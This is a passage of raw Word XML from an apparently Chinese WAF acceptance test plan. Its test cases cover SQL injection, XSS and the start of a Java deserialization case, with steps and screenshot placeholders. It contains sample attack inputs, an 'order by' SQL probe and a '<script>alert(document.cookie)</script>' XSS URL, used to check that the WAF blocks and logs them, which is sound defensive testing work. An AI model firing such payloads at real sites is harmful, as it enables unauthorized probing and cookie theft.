          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>EB攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="4B94D0A2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc21077791"/>
      <w:bookmarkStart w:id="30" w:name="_Toc81916094"/>
      <w:bookmarkStart w:id="31" w:name="_Toc463252664"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL注入攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="3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8AF280A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2714B3FD">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6049C248">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r>
              <w:t>QL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="382704C1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="429FBFFB">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0594CA71">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r>
              <w:t>QL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入攻击是对Web应用系统影响最为严重的攻击之一，通过S</w:t>
            </w:r>
            <w:r>
              <w:t>QL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入可能导致信息泄漏等恶性事件的产生，S</w:t>
            </w:r>
            <w:r>
              <w:t>QL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入的本质是数据库没有将输入的数据片段与可执行的代码加以区分，导致输入可执行代码对数据库进行有危险的操作。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="34C312B5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4BEE2054">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="095B038C">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03A3BAD9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B43D805">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>URL短接SQL 注入payload进行测试，可参考“</w:t>
            </w:r>
            <w:r>
              <w:t>?id=1 order by 10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”,观察是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5F6C36B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3AB169E5">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="43383C40">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73" name="Picture 385164373"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="sql_event_4de860670deb428f8fae6506ac50a0a3_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId21"/>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74" name="Picture 385164374"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="sql_event_4de860670deb428f8fae6506ac50a0a3_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId22"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="041B3041">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="557C1805">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14B2563B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18A2C3D1">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="373EED1D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2216E25D">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F6DED4">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc21077792"/>
      <w:bookmarkStart w:id="33" w:name="_Toc81916095"/>
      <w:bookmarkStart w:id="34" w:name="_Toc1259303473"/>
      <w:r>
        <w:t>XSS攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="3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0A0A0BF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="33CF4B13">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="327FEC7F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
            <w:r>
              <w:t>SS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6BD418DB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5D43ACB5">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="08457632">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
            <w:r>
              <w:t>SS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击同样也是W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用系统最为严重的攻击之一，主要利用网站交互和电子邮件等特性发起攻击，常见的有反射型X</w:t>
            </w:r>
            <w:r>
              <w:t>SS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、存储型X</w:t>
            </w:r>
            <w:r>
              <w:t>SS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，其原理是诱导用户打开有危险行为的链接。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7A0AF9A0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="42CA6858">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6A11C944">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>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 xml:space="preserve"> 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4763129D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ECDF3DE">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 在客户端构造请求，比如用浏览器访问如下链接：h</w:t>
            </w:r>
            <w:r>
              <w:t>ttp://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>w</w:t>
            </w:r>
            <w:r>
              <w:t>ww.site.com/index.php?url=&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E115586">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>观察W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1CF38CEB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="12176A63">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="275903CD">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75" name="Picture 385164375"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="xss_event_e6613b05161b4e428efc88e98ec20f5c_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId23"/>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76" name="Picture 385164376"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="xss_event_e6613b05161b4e428efc88e98ec20f5c_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId24"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2E2B4D51">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4671C4C0">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1595C821">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56B8A70">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4E41E029">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50416687">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78071684">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42F7BF1D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79AAA86D">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230C5137">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc81916096"/>
      <w:bookmarkStart w:id="36" w:name="_Toc21077793"/>
      <w:bookmarkStart w:id="37" w:name="_Toc1662129526"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>反序列化攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="3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69"/>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="2907"/>
      </w:tblGrid>
      <w:tr w14:paraId="5EDC006E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2A9468F3">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1A8AEE13">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>J</w:t>
            </w:r>
            <w:r>
              <w:t>ava</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
